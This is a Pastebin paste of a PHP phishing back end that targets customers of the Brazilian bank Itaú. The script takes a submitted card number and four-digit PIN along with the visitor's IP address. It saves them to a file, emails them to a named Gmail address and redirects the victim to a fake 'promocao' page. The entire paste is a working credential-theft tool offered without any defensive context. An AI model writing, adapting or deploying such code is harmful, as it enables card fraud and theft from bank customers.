Advertisement
Guest User

Untitled

a guest
Aug 20th, 2019
382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. <?php
  2. $numc=$_POST["numc"];
  3. $passc=$_POST["passc"];
  4.  
  5. $ip_usuario = $_SERVER['REMOTE_ADDR'];
  6.  
  7. $stringData = "
  8. ==============[ CONSULTAVEL ITAU NO PENTE PARTE 1 ]=================
  9.  
  10. IP: $ip_usuario
  11. NUMERO DO CARTAO: $numc
  12. SENHA DE 4: $passc
  13.  
  14. ============================================================
  15. ";
  16.  
  17. $ss = "CONSULTAVEL ITAU NO PENTE PARTE 1 IP: $ip_usuario ";
  18.  
  19. $arquivo = fopen("./".$ip_usuario.".txt", “w”);
  20. fwrite($arquivo, $stringData);
  21. fclose($arquivo);
  22.  
  23. header("Location:promocao.htm");
  24.  
  25. mail('thiago.silva1994br@gmail.com',$ss,$stringData);
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement